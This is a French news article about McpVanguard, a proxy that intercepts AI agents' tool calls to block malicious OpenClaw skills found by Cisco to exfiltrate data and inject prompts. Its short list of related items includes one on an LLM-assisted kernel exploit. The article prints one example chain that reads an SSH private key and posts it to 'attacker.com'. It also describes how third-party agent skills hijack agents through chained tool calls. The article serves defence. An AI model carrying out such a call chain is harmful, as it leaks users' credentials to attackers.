Le proxy McpVanguard bloque l'exfiltration des données de compétence OpenClaw

En réponse à la découverte par l'équipe de sécurité IA de Cisco de compétences tierces OpenClaw effectuant une exfiltration silencieuse de données et une injection d'invite, un développeur a publié McpVanguard, un proxy conçu pour s'interposer entre un agent d'IA et ses outils afin de bloquer les appels malveillants avant leur exécution.
Le problème : les appels malveillants en chaîne
Le problème de sécurité n'est pas un bogue dans OpenClaw lui-même, mais une conséquence du fait que les agents ont un accès au système de fichiers, une exécution de shell et des appels réseau sans limites d'application. Les tests de Cisco ont révélé un schéma où des appels individuels apparemment inoffensifs se combinent pour créer une violation, comme :
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Aucun appel ne semble malveillant isolément, mais ensemble, ils exfiltrent des données sensibles. Selon la source, ClawHub comptait plus de 820 compétences malveillantes à son apogée, et CVE-2026-25253 permettait aux attaquants d'obtenir une exécution de code à distance via un seul lien malveillant. La validation actuelle au niveau des compétences ne parvient pas à détecter ces séquences d'appels en chaîne.
La solution : le proxy McpVanguard
McpVanguard aborde ce problème en interceptant les appels entre l'agent et ses outils. Il utilise trois méthodes de détection :
- Correspondance de motifs
- Évaluation de l'intention sémantique
- Détection des chaînes comportementales sur l'ensemble de la session
L'installation se fait via pip : pip install mcp-vanguard.
Couche plus profonde : le protocole VEX
Le projet inclut une couche de sécurité plus profonde appelée protocole VEX, décrite comme un système « enregistreur de vol ». Il fournit :
- Des pistes d'audit Merkle pour une journalisation résistante à la falsification
- Une vérification d'identité de l'agent ancrée dans un TPM
- Une application au niveau des appels système
Le protocole VEX est construit en Rust et son développement a commencé en décembre 2023, avant qu'OpenClaw ne gagne en popularité. La source note que NVIDIA a récemment livré NemoClaw pour des objectifs de sécurité similaires, indiquant que ce type de menace ne va pas disparaître.
Les deux projets sont disponibles sur GitHub :
📖 Read the full source: r/openclaw
👀 See Also

Vulnérabilité d'exécution de code à distance dans l'application Windows Notepad CVE-2026-20841
CVE-2026-20841 est une vulnérabilité d'exécution de code à distance dans l'application Bloc-notes de Windows. Les détails et les étapes d'atténuation sont disponibles dans le guide de mise à jour du Centre de réponse de sécurité Microsoft.

Exploitation assistée par LLM : Aperçu du Mythos d'Anthropic a aidé à construire la première exploitation publique du noyau macOS sur Apple M5 en cinq jours.
En utilisant Mythos Preview d'Anthropic, la société de sécurité Calif a construit le premier exploit public de corruption mémoire du noyau macOS sur le silicium M5 d'Apple en cinq jours, brisant ainsi la sécurité matérielle MIE qu'Apple a mis cinq ans à développer.

openclaw-credential-vault traite quatre voies de fuite d'identifiants dans les agents IA
openclaw-credential-vault offre une isolation au niveau du système d'exploitation et une injection d'identifiants limitée aux sous-processus pour prévenir quatre voies d'exposition courantes des identifiants dans les configurations OpenClaw. Il inclut un nettoyage de sortie à quatre crochets et fonctionne avec n'importe quel outil CLI ou API.

Serveur MCP : Cartographie de l'exposition aux CVE et API publique publiée
Des chercheurs ont cartographié l'exposition aux CVE sur des milliers de serveurs MCP et ont créé une API publique pour interroger les vulnérabilités des dépendances. L'API permet de rechercher par dépôt/nom, de filtrer par gravité et de trier par nombre de CVE ou par actualité.